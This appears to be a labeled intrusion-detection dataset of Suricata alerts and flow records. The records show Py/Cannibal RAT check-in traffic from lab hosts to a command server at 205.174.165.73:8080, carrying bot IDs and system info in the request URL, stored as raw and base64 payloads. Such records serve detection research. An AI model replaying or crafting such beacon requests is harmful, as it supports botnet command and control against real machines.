['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4409898, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:22:59
61,875
Friday
[{'timestamp': '2017-07-07T13:22:59.940454+0000', 'flow_id': 178075974462197, 'pcap_cnt': 4409898, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52242, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:59.879349+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAoblpAAIAGTsbAqAoPza6lScwSH5BTSqjSZvXQllARAQBR2AAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:22:59.940454+0000', 'flow_id': 178075974462197, 'pcap_cnt': 4409898, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52242, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:59.879349+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAoblpAAIAGTsbAqAoPza6lScwSH5BTSqjSZvXQllARAQBR2AAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,246,502
192.168.10.15-52243-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 1, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4411673, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:23:09
82,217
Friday
[{'timestamp': '2017-07-07T13:23:10.023626+0000', 'flow_id': 2077825909481486, 'pcap_cnt': 4411673, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52243, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:23:09.942094+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobl9AAIAGTsHAqAoPza6lScwTH5DkQWloaJtfb1ARAQBvywAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:23:10.023626+0000', 'flow_id': 2077825909481486, 'pcap_cnt': 4411673, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52243, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:23:09.942094+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobl9AAIAGTsHAqAoPza6lScwTH5DkQWloaJtfb1ARAQBvywAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,246,549
192.168.10.9-2451-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4412628, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:23:16
75,442
Friday
[{'timestamp': '2017-07-07T13:23:16.815208+0000', 'flow_id': 1955303377882164, 'pcap_cnt': 4412628, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2451, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:23:16.740404+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoKD1AAIAGlOnAqAoJza6lSQmTH5CxkcbZM/fD11ARAQDXzAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:23:16.815208+0000', 'flow_id': 1955303377882164, 'pcap_cnt': 4412628, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2451, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:23:16.740404+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoKD1AAIAGlOnAqAoJza6lSQmTH5CxkcbZM/fD11ARAQDXzAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,246,582
192.168.10.15-52244-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4413071, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:23:20
70,685
Friday
[{'timestamp': '2017-07-07T13:23:20.090447+0000', 'flow_id': 1668416742641719, 'pcap_cnt': 4413071, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52244, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:23:20.020535+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobmRAAIAGTrzAqAoPza6lScwUH5At90JFJ5Zn9FARAQCFuAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:23:20.090447+0000', 'flow_id': 1668416742641719, 'pcap_cnt': 4413071, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52244, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:23:20.020535+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobmRAAIAGTrzAqAoPza6lScwUH5At90JFJ5Zn9FARAQCFuAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
308
attack
1,246,586
192.168.10.15-52247-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4415370, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:23:30
66,091
Friday
[{'timestamp': '2017-07-07T13:23:30.148186+0000', 'flow_id': 1338911147312052, 'pcap_cnt': 4415370, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52247, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:23:30.082868+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobmlAAIAGTrfAqAoPza6lScwXH5ACYIMf4d3MvVARAQBRYQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:23:30.148186+0000', 'flow_id': 1338911147312052, 'pcap_cnt': 4415370, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52247, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:23:30.082868+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobmlAAIAGTrfAqAoPza6lScwXH5ACYIMf4d3MvVARAQBRYQAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,246,628
192.168.10.15-52248-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4421916, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:23:40
78,129
Friday
